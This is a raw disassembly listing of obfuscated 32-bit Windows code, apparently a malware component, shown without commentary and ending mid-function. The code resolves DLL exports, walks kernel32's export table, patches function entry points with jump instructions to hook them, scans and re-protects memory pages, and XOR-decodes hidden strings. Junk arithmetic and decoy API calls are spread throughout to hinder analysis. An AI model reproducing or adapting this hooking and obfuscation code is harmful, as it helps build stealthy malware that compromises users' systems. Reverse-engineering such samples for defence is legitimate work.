call sub_40C508 ; GetCurrentProcessId
loc_402798: ; CODE XREF: sub_402572+1BE�j
; sub_402572+1C7�j ...
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 2
jnz loc_40282C
mov edx, ebx
dec edx
cmp byte ptr [eax+edx], 2
jnz short loc_40282C
mov edx, ebx
sub edx, 2
cmp byte ptr [eax+edx], 2
jnz short loc_40282C
mov edx, ebx
sub edx, 3
cmp byte ptr [eax+edx], 2
jnz short loc_40282C
mov edx, ebx
sub edx, 4
movzx eax, byte ptr [eax+edx]
cmp eax, 0E8h
jz short loc_4027DB
cmp eax, 0E9h
jnz short loc_40282C
loc_4027DB: ; CODE XREF: sub_402572+260�j
lea edi, [ebp+var_18+3]
lea esi, aA9s ; "A^9S"
mov ecx, 5
rep movsb
mov eax, [ebp+arg_4]
or edx, 0FFFFFFFFh
mov ecx, [ebp+arg_8]
lea ecx, [eax+ecx+5]
add ecx, ebx
sub ecx, 4
sub edx, ecx
add edx, eax
mov eax, edx
sub eax, 4
mov [ebp-10h], eax
call sub_40C634 ; IsDebuggerPresent
mov eax, [ebp+arg_4]
mov edx, [ebp+arg_8]
lea eax, [eax+edx+5]
add eax, ebx
sub eax, 4
mov edx, [ebp-10h]
mov ds:1[eax], edx
call sub_40C514 ; GetCurrentThreadId
loc_40282C: ; CODE XREF: sub_402572+22D�j
; sub_402572+23A�j ...
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 1
jnz short loc_402894
mov edx, ebx
dec edx
cmp byte ptr [eax+edx], 1
jnz short loc_402894
mov edx, ebx
sub edx, 2
cmp byte ptr [eax+edx], 1
jnz short loc_402894
mov edx, ebx
sub edx, 3
cmp byte ptr [eax+edx], 1
jnz short loc_402894
mov edx, ebx
sub edx, 4
movzx eax, byte ptr [eax+edx]
cmp al, 3Dh
jz short loc_40286F
cmp eax, 0FEh
jz short loc_40286F
cmp eax, 0FFh
jnz short loc_402894
loc_40286F: ; CODE XREF: sub_402572+2ED�j
; sub_402572+2F4�j
call sub_40C598 ; GetTickCount
call sub_40C508 ; GetCurrentProcessId
mov edi, [ebp+arg_4]
mov esi, [ebp+arg_8]
lea edi, [edi+esi+5]
add edi, ebx
sub edi, 4
mov ds:1[edi], eax
call sub_40C634 ; IsDebuggerPresent
loc_402894: ; CODE XREF: sub_402572+2C1�j
; sub_402572+2CA�j ...
inc ebx
cmp ebx, 400h
jb loc_40258E
loc_4028A1: ; CODE XREF: sub_402572+70�j
pop edi
pop esi
pop ebx
leave
retn
sub_402572 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4028A6 proc near ; CODE XREF: sub_402A4D+813�p
var_24 = dword ptr -24h
var_1E = dword ptr -1Eh
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_A = byte ptr -0Ah
var_9 = byte ptr -9
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
push ebx
push esi
push edi
call sub_40C514 ; GetCurrentThreadId
mov esi, [ebp+arg_0]
jmp short loc_4028DA
; ---------------------------------------------------------------------------
loc_4028B9: ; CODE XREF: sub_4028A6+3E�j
call sub_40C538 ; RtlGetLastWin32Error
xor edi, edi
jmp short loc_4028C9
; ---------------------------------------------------------------------------
loc_4028C2: ; CODE XREF: sub_4028A6+29�j
cmp byte ptr [esi+edi], 0
jnz short loc_4028D1
inc edi
loc_4028C9: ; CODE XREF: sub_4028A6+1A�j
cmp edi, 3E8h
jbe short loc_4028C2
loc_4028D1: ; CODE XREF: sub_4028A6+20�j
cmp edi, 3E8h
jnb short loc_4028EB
inc esi
loc_4028DA: ; CODE XREF: sub_4028A6+11�j
mov eax, [ebp+arg_4]
sub eax, 3E8h
cmp esi, eax
jbe short loc_4028B9
jmp loc_402A48
; ---------------------------------------------------------------------------
loc_4028EB: ; CODE XREF: sub_4028A6+31�j
add esi, 0Ah
movzx edx, [ebp+arg_8]
shl edx, 2
mov edi, ds:dword_40F380[edx]
xor ebx, ebx
loc_4028FE: ; CODE XREF: sub_4028A6+105�j
mov eax, edi
add eax, ebx
push eax
call sub_401D14
pop ecx
call sub_40C5A4 ; GetVersion
movzx eax, byte ptr [edi+ebx]
cmp eax, 0E8h
jz short loc_402945
cmp eax, 0E9h
jz short loc_402945
call sub_40C514 ; GetCurrentThreadId
and [ebp+var_4], 0
jmp short loc_402939
; ---------------------------------------------------------------------------
loc_40292B: ; CODE XREF: sub_4028A6+9B�j
mov eax, ebx
add eax, [ebp+var_4]
mov dl, [edi+eax]
mov [esi+eax], dl
inc [ebp+var_4]
loc_402939: ; CODE XREF: sub_4028A6+83�j
mov eax, ds:dword_40E00C
cmp [ebp+var_4], eax
jb short loc_40292B
jmp short loc_4029A2
; ---------------------------------------------------------------------------
loc_402945: ; CODE XREF: sub_4028A6+71�j
; sub_4028A6+78�j
mov eax, dword_43C125
mov [ebp+var_1E], eax
mov al, [edi+ebx]
mov [esi+ebx], al
call sub_40C634 ; IsDebuggerPresent
lea eax, [edi+ebx+1]
mov eax, [eax]
mov [ebp+var_8], eax
mov edx, esi
add edx, ebx
sub eax, edx
mov edx, edi
add edx, ebx
add eax, edx
mov [ebp+var_14], eax
mov [ebp+var_18], 7962h
mov eax, 3CA4h
mul [ebp+var_18]
mov [ebp+var_24], eax
mov [ebp+var_18], eax
lea eax, [esi+ebx+1]
mov edx, [ebp+var_14]
mov [eax], edx
mov [ebp+var_1A], 2D36h
movzx eax, [ebp+var_1A]
imul eax, 49AAh
mov [ebp+var_1A], ax
loc_4029A2: ; CODE XREF: sub_4028A6+9D�j
add ebx, ds:dword_40E00C
cmp ebx, 5
jb loc_4028FE
call sub_40C634 ; IsDebuggerPresent
or eax, 0FFFFFFFFh
mov edx, esi
add edx, ebx
sub eax, edx
mov edx, edi
add edx, ebx
add eax, edx
sub eax, 4
mov [ebp+var_8], eax
mov [ebp+var_9], 16h
movzx eax, [ebp+var_9]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_9], al
mov byte ptr [ebx+esi], 0E9h
mov [ebp+var_A], 55h
movzx eax, [ebp+var_A]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_A], al
lea eax, [esi+ebx+1]
mov edx, [ebp+var_8]
mov [eax], edx
or eax, 0FFFFFFFFh
sub eax, edi
lea edx, [esi+ebx+5]
add eax, edx
sub eax, 4
mov [ebp+var_8], eax
mov [ebp+var_10], 2E4Bh
sub [ebp+var_10], 0F4Bh
mov byte ptr [edi], 0E9h
call sub_40C598 ; GetTickCount
mov eax, [ebp+var_8]
mov ds:1[edi], eax
call sub_40C634 ; IsDebuggerPresent
push ebx
push esi
movzx edx, [ebp+arg_8]
shl edx, 4
push off_43BE8C[edx]
call sub_402572
add esp, 0Ch
loc_402A48: ; CODE XREF: sub_4028A6+40�j
pop edi
pop esi
pop ebx
leave
retn
sub_4028A6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A4D proc near ; CODE XREF: sub_40A766+534�p
var_2578 = dword ptr -2578h
var_2573 = byte ptr -2573h
var_2572 = word ptr -2572h
var_2570 = dword ptr -2570h
var_21AA = byte ptr -21AAh
var_21A4 = word ptr -21A4h
var_21A2 = word ptr -21A2h
var_21A0 = dword ptr -21A0h
var_219C = byte ptr -219Ch
var_219B = word ptr -219Bh
var_2199 = byte ptr -2199h
var_2196 = word ptr -2196h
var_2193 = byte ptr -2193h
var_2192 = byte ptr -2192h
var_218A = word ptr -218Ah
var_2188 = byte ptr -2188h
var_2184 = dword ptr -2184h
var_2180 = dword ptr -2180h
var_217C = dword ptr -217Ch
var_2178 = dword ptr -2178h
var_2174 = word ptr -2174h
var_2172 = word ptr -2172h
var_2170 = dword ptr -2170h
var_216C = dword ptr -216Ch
var_2068 = dword ptr -2068h
var_2062 = word ptr -2062h
var_2060 = dword ptr -2060h
var_205C = dword ptr -205Ch
var_2056 = byte ptr -2056h
var_2055 = byte ptr -2055h
var_2054 = dword ptr -2054h
var_2050 = dword ptr -2050h
var_204C = dword ptr -204Ch
var_2044 = dword ptr -2044h
var_2034 = dword ptr -2034h
var_2030 = dword ptr -2030h
var_202C = dword ptr -202Ch
var_2025 = byte ptr -2025h
var_2024 = dword ptr -2024h
var_2020 = dword ptr -2020h
var_101C = dword ptr -101Ch
var_1015 = byte ptr -1015h
var_1014 = dword ptr -1014h
var_1010 = dword ptr -1010h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
mov eax, 2578h
call sub_40C498
push ebx
push esi
push edi
mov [ebp+var_2056], 8Bh
sub [ebp+var_2056], 0C3h
call sub_40223C
mov [ebp+var_2054], 7F03h
mov eax, [ebp+var_2054]
mov edx, eax
add edx, eax
mov [ebp+var_2054], edx
mov [ebp+var_2025], 0
call sub_40C5A4 ; GetVersion
cmp eax, 80000000h
jnb short loc_402AA4
mov [ebp+var_2025], 1
loc_402AA4: ; CODE XREF: sub_402A4D+4E�j
call sub_40C634 ; IsDebuggerPresent
mov [ebp+var_1015], 0
loc_402AB0: ; CODE XREF: sub_402A4D+10A�j
cmp [ebp+var_2025], 0
jnz short loc_402ACD
movzx edi, [ebp+var_1015]
shl edi, 4
cmp byte_43BE90[edi], 1
jz short loc_402AEA
loc_402ACD: ; CODE XREF: sub_402A4D+6A�j
cmp [ebp+var_2025], 0
jz short loc_402AEC
movzx edi, [ebp+var_1015]
shl edi, 4
cmp byte_43BE90[edi], 2
jnz short loc_402AEC
loc_402AEA: ; CODE XREF: sub_402A4D+7E�j
jmp short loc_402B3E
; ---------------------------------------------------------------------------
loc_402AEC: ; CODE XREF: sub_402A4D+87�j
; sub_402A4D+9B�j
call sub_40C574 ; GetProcessHeap
movzx edi, [ebp+var_1015]
mov esi, edi
shl esi, 4
push off_43BE88[esi]
call sub_40C640 ; LoadLibraryA
mov ds:dword_414090[edi*4], eax
movzx edi, [ebp+var_1015]
mov esi, edi
shl esi, 4
push off_43BE84[esi]
shl edi, 2
push ds:dword_414090[edi]
call sub_40C568 ; GetProcAddress
mov ds:dword_40F380[edi], eax
call sub_40C598 ; GetTickCount
loc_402B3E: ; CODE XREF: sub_402A4D:loc_402AEA�j
add [ebp+var_1015], 1
movzx edi, [ebp+var_1015]
shl edi, 4
cmp off_43BE84[edi], 0
jnz loc_402AB0
mov ax, word_43C129
mov [ebp+var_2062], ax
mov [ebp+var_1015], 0
loc_402B71: ; CODE XREF: sub_402A4D+88F�j
movzx edi, [ebp+var_1015]
shl edi, 2
cmp ds:dword_40F380[edi], 0
jz loc_4032C3
call sub_40C574 ; GetProcessHeap
movzx edi, [ebp+var_1015]
shl edi, 2
mov edi, ds:dword_414090[edi]
mov [ebp+var_2034], edi
cmp [ebp+var_2025], 0
jz loc_402E88
call sub_40C598 ; GetTickCount
call sub_4022CC
mov [ebp+var_2030], eax
lea edi, [ebp+var_2192]
lea esi, aTzT6 ; "tz|&>T6"
movsd
movsd
mov edi, [ebp+var_2034]
shr edi, 16h
shl edi, 16h
mov [ebp+var_8], edi
mov eax, edi
add eax, 400000h
mov [ebp+var_1014], eax
xor ebx, ebx
jmp short loc_402C47
; ---------------------------------------------------------------------------
loc_402BF0: ; CODE XREF: sub_402A4D+203�j
mov [ebp+var_2193], 73h
movzx eax, [ebp+var_2193]
imul eax, 227Fh
mov [ebp+var_2193], al
mov eax, dword_43C020
add eax, 0FF5h
push eax
push [ebp+var_8]
call sub_40C61C ; IsBadReadPtr
mov [ebp+var_4], eax
mov ax, word_43C133
mov [ebp+var_2196+1], ax
xor [ebp+var_4], 1
shl [ebp+var_4], 2
mov edi, [ebp+var_4]
mov [ebp+ebx*4+var_1010], edi
inc ebx
add [ebp+var_8], 1000h
loc_402C47: ; CODE XREF: sub_402A4D+1A1�j
mov eax, [ebp+var_1014]
cmp [ebp+var_8], eax
jbe short loc_402BF0
lea eax, [ebp+var_2188]
push eax
call sub_40C5F8 ; GlobalMemoryStatus
mov [ebp+var_218A], 5761h
movzx eax, [ebp+var_218A]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_218A], ax
and [ebp+var_101C], 0
jmp loc_402DD4
; ---------------------------------------------------------------------------
loc_402C87: ; CODE XREF: sub_402A4D+398�j
mov [ebp+var_2199], 6Fh
movzx eax, [ebp+var_2199]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_2199], al
push 0FFFFh
push [ebp+var_101C]
push [ebp+var_2030]
call sub_402465
add esp, 0Ch
mov [ebp+var_C], eax
or eax, eax
jnz short loc_402CE0
mov [ebp+var_219C], 0D9h
movzx eax, [ebp+var_219C]
imul eax, 3A66h
mov [ebp+var_219C], al
jmp loc_402DCA
; ---------------------------------------------------------------------------
loc_402CE0: ; CODE XREF: sub_402A4D+272�j
and dword ptr [ebp-2198h], 0
loc_402CE7: ; CODE XREF: sub_402A4D+871�j
mov eax, [ebp-2198h]
mov [ebp+var_8], eax
jmp loc_402DA7
; ---------------------------------------------------------------------------
loc_402CF5: ; CODE XREF: sub_402A4D+361�j
mov [ebp+var_21A0], 1E00h
inc [ebp+var_21A0]
xor ebx, ebx
loc_402D07: ; CODE XREF: sub_402A4D+30E�j
lea edi, [ebp+var_21AA]
lea esi, aLj0yrfp ; "lJ0YrFP"
movsd
movsd
mov edi, [ebp+var_8]
shr edi, 2
shl edi, 2
add edi, [ebp+var_C]
mov edi, [edi+ebx*4]
mov [ebp+var_4], edi
and [ebp+var_4], 4
mov edi, [ebp+ebx*4+var_1010]
cmp [ebp+var_4], edi
jnz short loc_402D5D
mov [ebp+var_21A2], 71BCh
movzx eax, [ebp+var_21A2]
imul eax, 70FFh
mov [ebp+var_21A2], ax
inc ebx
cmp ebx, 400h
jb short loc_402D07
loc_402D5D: ; CODE XREF: sub_402A4D+2E8�j
cmp ebx, 3FFh
jb short loc_402DA0
mov byte ptr [ebp+var_21A2+1], 38h
add byte ptr [ebp+var_21A2+1], 7Bh
mov eax, [ebp+var_8]
add eax, 1000h
mov [ebp-2198h], eax
mov [ebp+var_21A4], 6CA4h
movzx eax, [ebp+var_21A4]
imul eax, 732Ch
mov [ebp+var_21A4], ax
jmp short loc_402E00
; ---------------------------------------------------------------------------
loc_402DA0: ; CODE XREF: sub_402A4D+316�j
add [ebp+var_8], 1000h
loc_402DA7: ; CODE XREF: sub_402A4D+2A3�j
cmp [ebp+var_8], 0F000h
jbe loc_402CF5
push [ebp+var_C]
call sub_4024C1
pop ecx
mov ax, word_43C13D
mov [ebp+var_219B], ax
loc_402DCA: ; CODE XREF: sub_402A4D+28E�j
add [ebp+var_101C], 10000h
loc_402DD4: ; CODE XREF: sub_402A4D+235�j
mov eax, [ebp+var_2180]
sub eax, 0FFFFh
cmp [ebp+var_101C], eax
jbe loc_402C87
push [ebp+var_2030]
call sub_40C55C ; CloseHandle
call sub_40C598 ; GetTickCount
jmp loc_4032C3
; ---------------------------------------------------------------------------
loc_402E00: ; CODE XREF: sub_402A4D+351�j
movzx edi, [ebp+var_1015]
shl edi, 2
mov edi, ds:dword_40F380[edi]
mov [ebp+var_1014], edi
and [ebp+var_1014], 0
loc_402E1E: ; CODE XREF: sub_402A4D+439�j
mov [ebp+var_2193], 0E0h
movzx eax, [ebp+var_2193]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_2193], al
mov edi, [ebp+var_1014]
shl edi, 2
mov esi, [ebp+var_8]
shr esi, 2
shl esi, 2
add esi, [ebp+var_C]
mov esi, [esi+edi]
mov [ebp+edi+var_2020], esi
mov edi, [ebp+var_1014]
shl edi, 2
mov esi, [ebp+var_8]
shr esi, 2
shl esi, 2
add esi, [ebp+var_C]
add edi, esi
or byte ptr [edi], 2
call sub_40C538 ; RtlGetLastWin32Error
inc [ebp+var_1014]
cmp [ebp+var_1014], 400h
jb short loc_402E1E
loc_402E88: ; CODE XREF: sub_402A4D+15F�j
call sub_40C538 ; RtlGetLastWin32Error
cmp [ebp+var_2025], 0
jnz loc_402F51
mov word ptr [ebp+var_2170+2], 1C0Eh
inc word ptr [ebp+var_2170+2]
push offset aKernel32_dll ; "kernel32.dll"
call sub_40C550 ; GetModuleHandleA
mov [ebp+var_216C], eax
mov word ptr [ebp+var_2170], 33AAh
add word ptr [ebp+var_2170], 0B06h
mov edx, eax
add edx, ds:3Ch[eax]
mov [ebp+var_2178], edx
call sub_40C5A4 ; GetVersion
mov eax, [ebp+var_216C]
mov edx, [ebp+var_2178]
add edx, 78h
add eax, [edx]
mov [ebp+var_217C], eax
mov [ebp+var_2172], 7D9h
add [ebp+var_2172], 4B85h
mov eax, [ebp+var_216C]
mov edx, [ebp+var_217C]
add edx, 1Ch
add eax, [edx]
mov [ebp+var_2180], eax
mov eax, [ebp+var_216C]
mov edx, [ebp+var_2180]
add eax, [edx]
mov [ebp+var_2184], eax
mov [ebp+var_2174], 3604h
add [ebp+var_2174], 2981h
mov [ebp+var_2068], eax
call sub_40C634 ; IsDebuggerPresent
loc_402F51: ; CODE XREF: sub_402A4D+447�j
push 1Ch
lea eax, [ebp+var_2050]
push eax
call sub_40C6A0 ; RtlZeroMemory
call sub_40C634 ; IsDebuggerPresent
mov eax, [ebp+var_2034]
mov [ebp+var_202C], eax
mov [ebp+var_2055], 50h
movzx eax, [ebp+var_2055]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_2055], al
loc_402F8A: ; CODE XREF: sub_402A4D+57D�j
; sub_402A4D+5BC�j
push 1Ch
lea eax, [ebp+var_2050]
push eax
push [ebp+var_202C]
call sub_40C700 ; VirtualQuery
call sub_40C514 ; GetCurrentThreadId
mov eax, [ebp+var_2034]
cmp [ebp+var_204C], eax
jnz short loc_40300E
mov eax, [ebp+var_2044]
mov [ebp+var_205C], eax
add [ebp+var_202C], eax
cmp [ebp+var_2025], 0
jnz short loc_402F8A
mov word ptr [ebp+var_216C+2], 25A3h
sub word ptr [ebp+var_216C+2], 1506h
push 20060000h
push 0
mov edi, [ebp+var_205C]
shr edi, 0Ch
push edi
mov edi, [ebp+var_2050]
shr edi, 0Ch
push edi
push 1000Dh
call [ebp+var_2068] ; DATA XREF: .data:loc_43F3DE�r
; sub_43F401+8C�w ...
loc_403004: ; DATA XREF: .data:0043E439�r
; .data:loc_43E475�r ...
call sub_40C634 ; IsDebuggerPresent
jmp loc_402F8A
; ---------------------------------------------------------------------------
loc_40300E: ; CODE XREF: sub_402A4D+562�j
movzx edi, [ebp+var_1015]
shl edi, 2
mov esi, [ebp+var_202C]
sub esi, [ebp+var_2034]
mov ds:dword_4119B0[edi], esi
call sub_40C598 ; GetTickCount
movzx edi, [ebp+var_1015]
shl edi, 2
mov edi, ds:dword_40F380[edi]
mov [ebp+var_1014], edi
mov eax, dword_43C020
add eax, 0FF5h
push eax
push edi
call sub_40C628 ; IsBadWritePtr
mov [ebp+var_2060], eax
or eax, eax
jnz loc_40326D
call sub_40C5A4 ; GetVersion
cmp [ebp+arg_0], 0
jz loc_40324C
call sub_40C538 ; RtlGetLastWin32Error
mov eax, [ebp+var_1014]
movzx eax, byte ptr [eax]
cmp eax, 0E9h
jz short loc_4030C4
mov [ebp+var_2572], 1FFh
movzx eax, [ebp+var_2572]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_2572], ax
cmp [ebp+arg_0], 1
jnz loc_40324C
mov [ebp+var_2573], 0FEh
add [ebp+var_2573], 32h
jmp loc_40326D
; ---------------------------------------------------------------------------
loc_4030C4: ; CODE XREF: sub_402A4D+63B�j
mov eax, [ebp+var_1014]
mov edx, ds:1[eax]
sub edx, 0FFFFFFFFh
lea eax, [edx+eax+4]
mov [ebp+var_2024], eax
mov [ebp+var_2170], 5AC5h
add [ebp+var_2170], 6A76h
mov byte ptr [ebp+var_216C+3], 0
loc_4030F9: ; CODE XREF: sub_402A4D+751�j
sub [ebp+var_2024], 5
mov eax, [ebp+var_2024]
mov [ebp+var_4], eax
loc_403109: ; CODE XREF: sub_402A4D+6F5�j
mov eax, [ebp+var_4]
mov edx, eax
dec edx
cmp byte ptr [edx], 0
jnz short loc_40313A
mov edx, eax
sub edx, 2
cmp byte ptr [edx], 0
jnz short loc_40313A
mov edx, eax
sub edx, 3
cmp byte ptr [edx], 0
jnz short loc_40313A
mov edx, eax
sub edx, 4
cmp byte ptr [edx], 0
jnz short loc_40313A
sub eax, 5
cmp byte ptr [eax], 0
jz short loc_403144
loc_40313A: ; CODE XREF: sub_402A4D+6C5�j
; sub_402A4D+6CF�j ...
call sub_40C598 ; GetTickCount
dec [ebp+var_4]
jmp short loc_403109
; ---------------------------------------------------------------------------
loc_403144: ; CODE XREF: sub_402A4D+6EB�j
movzx edi, byte ptr [ebp+var_216C+3]
shl edi, 2
mov esi, [ebp+var_4]
mov [ebp+edi+var_2570], esi
add byte ptr [ebp+var_216C+3], 1
movzx eax, byte ptr [esi]
cmp eax, 0E9h
jnz short loc_4031A3
lea edi, [ebp+var_2573]
lea esi, byte_43C13F
mov ecx, 3
rep movsb
mov eax, [ebp+var_4]
mov edx, ds:1[eax]
sub edx, 0FFFFFFFFh
lea eax, [edx+eax+4]
mov [ebp+var_2024], eax
mov eax, dword_43C142
mov [ebp+var_2578+1], eax
jmp loc_4030F9
; ---------------------------------------------------------------------------
loc_4031A3: ; CODE XREF: sub_402A4D+71A�j
mov ebx, [ebp+var_4]
jmp short loc_4031CB
; ---------------------------------------------------------------------------
loc_4031A8: ; CODE XREF: sub_402A4D+784�j
lea edi, [ebp+var_2578+1]
lea esi, aLvdw_x ; "LVDW.X"
mov ecx, 7
rep movsb
mov eax, [ebp+var_1014]
add eax, ebx
sub eax, [ebp+var_4]
mov dl, [ebx]
mov [eax], dl
inc ebx
loc_4031CB: ; CODE XREF: sub_402A4D+759�j
cmp ebx, [ebp+var_2024]
jb short loc_4031A8
loc_4031D3: ; CODE XREF: sub_402A4D+7ED�j
sub byte ptr [ebp+var_216C+3], 1
movzx edi, byte ptr [ebp+var_216C+3]
shl edi, 2
mov ebx, [ebp+edi+var_2570]
loc_4031EB: ; CODE XREF: sub_402A4D+7E2�j
mov byte ptr [ebx], 0
cmp byte ptr ds:1[ebx], 0
jnz short loc_403220
cmp byte ptr ds:2[ebx], 0
jnz short loc_403220
cmp byte ptr ds:3[ebx], 0
jnz short loc_403220
cmp byte ptr ds:4[ebx], 0
jnz short loc_403220
cmp byte ptr ds:5[ebx], 0
jz short loc_403231
loc_403220: ; CODE XREF: sub_402A4D+7A9�j
; sub_402A4D+7B3�j ...
mov byte ptr [ebp+var_2172+1], 14h
sub byte ptr [ebp+var_2172+1], 0Eh
inc ebx
jmp short loc_4031EB
; ---------------------------------------------------------------------------
loc_403231: ; CODE XREF: sub_402A4D+7D1�j
movzx eax, byte ptr [ebp+var_216C+3]
or eax, eax
jg short loc_4031D3
call sub_40C538 ; RtlGetLastWin32Error
cmp [ebp+arg_0], 1
jz short loc_40326D
call sub_40C5A4 ; GetVersion
loc_40324C: ; CODE XREF: sub_402A4D+622�j
; sub_402A4D+65E�j
movzx eax, [ebp+var_1015]
push eax
push [ebp+var_202C]
push [ebp+var_2034]
call sub_4028A6
add esp, 0Ch
call sub_40C538 ; RtlGetLastWin32Error
loc_40326D: ; CODE XREF: sub_402A4D+613�j
; sub_402A4D+672�j ...
cmp [ebp+var_2025], 0
jz short loc_4032C3
mov eax, dword_43C14D
mov [ebp+var_216C], eax
and [ebp+var_1014], 0
loc_403288: ; CODE XREF: sub_402A4D+86A�j
mov edi, [ebp+var_1014]
shl edi, 2
mov esi, [ebp+var_8]
shr esi, 2
shl esi, 2
add esi, [ebp+var_C]
mov edx, [ebp+edi+var_2020]
mov [esi+edi], edx
inc [ebp+var_1014]
cmp [ebp+var_1014], 400h
jb short loc_403288
call sub_40C574 ; GetProcessHeap
jmp loc_402CE7
; ---------------------------------------------------------------------------
loc_4032C3: ; CODE XREF: sub_402A4D+136�j
; sub_402A4D+3AE�j ...
add [ebp+var_1015], 1
movzx edi, [ebp+var_1015]
shl edi, 4
cmp off_43BE84[edi], 0
jnz loc_402B71
pop edi
pop esi
pop ebx
leave
retn
sub_402A4D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4032E7 proc near ; CODE XREF: sub_403449+50�p
; sub_4034D8+46�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_43C15C
lea eax, ds:41C960h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
mov [ebp+var_4], 314h
xor edi, edi
jmp short loc_40332D
; ---------------------------------------------------------------------------
loc_403316: ; CODE XREF: sub_4032E7+48�j
mov eax, dword_43C15C
add eax, edi
lea eax, ds:41C960h[eax]
movsx edx, byte ptr [eax]
xor edx, 2Ah
mov [eax], dl
inc edi
loc_40332D: ; CODE XREF: sub_4032E7+2D�j
cmp edi, esi
jl short loc_403316
mov [ebp+var_8], 1B1h
mov eax, dword_43C15C
add eax, esi
mov byte ptr ds:dword_41C960[eax], 0
xor edi, edi
mov edi, dword_43C15C
add dword_43C15C, 3
mov eax, dword_43C15C
lea eax, [eax+esi+1]
mov dword_43C15C, eax
cmp eax, 0DC8h
jle short loc_403372
and dword_43C15C, 0
loc_403372: ; CODE XREF: sub_4032E7+82�j
mov [ebp+var_C], 2D9h
lea eax, dword_41C960[edi]
pop edi
pop esi
leave
retn
sub_4032E7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403383 proc near ; CODE XREF: sub_403449+31�p
; sub_4034D8+35�p
var_F = byte ptr -0Fh
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
lea edi, [ebp+var_B]
lea esi, dword_43C160
mov ecx, 5
rep movsb
call sub_40C538 ; RtlGetLastWin32Error
mov ecx, ebx
or eax, 0FFFFFFFFh
loc_4033A9: ; CODE XREF: sub_403383+2B�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4033A9
mov edi, eax
mov [ebp+var_6], di
call sub_40C538 ; RtlGetLastWin32Error
mov ax, [ebp+var_6]
mov [ebp+var_2], ax
jmp short loc_4033FA
; ---------------------------------------------------------------------------
loc_4033C5: ; CODE XREF: sub_403383+7D�j
movzx eax, [ebp+var_2]
cmp byte ptr [ebx+eax], 5Ch
jnz short loc_4033F6
lea edi, [ebp+var_F]
lea esi, byte_43C165
mov ecx, 3
rep movsb
inc [ebp+var_2]
mov [ebp+var_C], 8Dh
movzx eax, [ebp+var_C]
imul eax, 3989h
mov [ebp+var_C], al
jmp short loc_403402
; ---------------------------------------------------------------------------
loc_4033F6: ; CODE XREF: sub_403383+4A�j
dec [ebp+var_2]
loc_4033FA: ; CODE XREF: sub_403383+40�j
movzx eax, [ebp+var_2]
or eax, eax
jg short loc_4033C5
loc_403402: ; CODE XREF: sub_403383+71�j
mov ax, [ebp+var_2]
cmp ax, [ebp+var_6]
jnb short loc_40343F
mov [ebp+var_4], 0
jmp short loc_40342D
; ---------------------------------------------------------------------------
loc_403414: ; CODE XREF: sub_403383+BA�j
movzx eax, [ebp+var_4]
mov edx, [ebp+arg_4]
movzx ecx, [ebp+var_2]
mov esi, eax
add esi, ecx
mov cl, [ebx+esi]
mov [edx+eax], cl
inc [ebp+var_4]
loc_40342D: ; CODE XREF: sub_403383+8F�j
movzx eax, [ebp+var_4]
movzx edx, [ebp+var_6]
movzx ecx, [ebp+var_2]
sub edx, ecx
cmp eax, edx
jle short loc_403414
loc_40343F: ; CODE XREF: sub_403383+87�j
call sub_40C508 ; GetCurrentProcessId
pop edi
pop esi
pop ebx
leave
retn
sub_403383 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403449 proc near ; CODE XREF: sub_403AA3+AC�p
; sub_403C5F+286�p ...
var_10F = byte ptr -10Fh
var_10A = dword ptr -10Ah
var_106 = byte ptr -106h
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
push edi
call sub_40C5A4 ; GetVersion
mov eax, dword_43C168
mov [ebp+var_10A], eax
mov ebx, 63Dh
sub ebx, 6B35h
lea eax, [ebp+var_106]
push eax
push [ebp+arg_0]
call sub_403383
lea edi, [ebp+var_10F]
lea esi, aOqd ; " OQD"
mov ecx, 5
rep movsb
push 2
push offset word_446666
call sub_4032E7
push eax
lea edi, [ebp+var_106]
push edi
call sub_40CA54
add esp, 18h
call sub_40C5A4 ; GetVersion
lea eax, [ebp+var_106]
push eax
call sub_40C5D4 ; GlobalAddAtomA
mov [ebp+var_2], 4353h
movzx eax, [ebp+var_2]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_2], ax
pop edi
pop esi
pop ebx
leave
retn
sub_403449 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4034D8 proc near ; CODE XREF: sub_409847+2F3�p
; sub_409847+387�p ...
var_10D = byte ptr -10Dh
var_10A = word ptr -10Ah
var_108 = word ptr -108h
var_105 = byte ptr -105h
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push esi
push edi
mov [ebp+var_1], 0C0h
sub [ebp+var_1], 0C7h
lea edi, [ebp+var_10D]
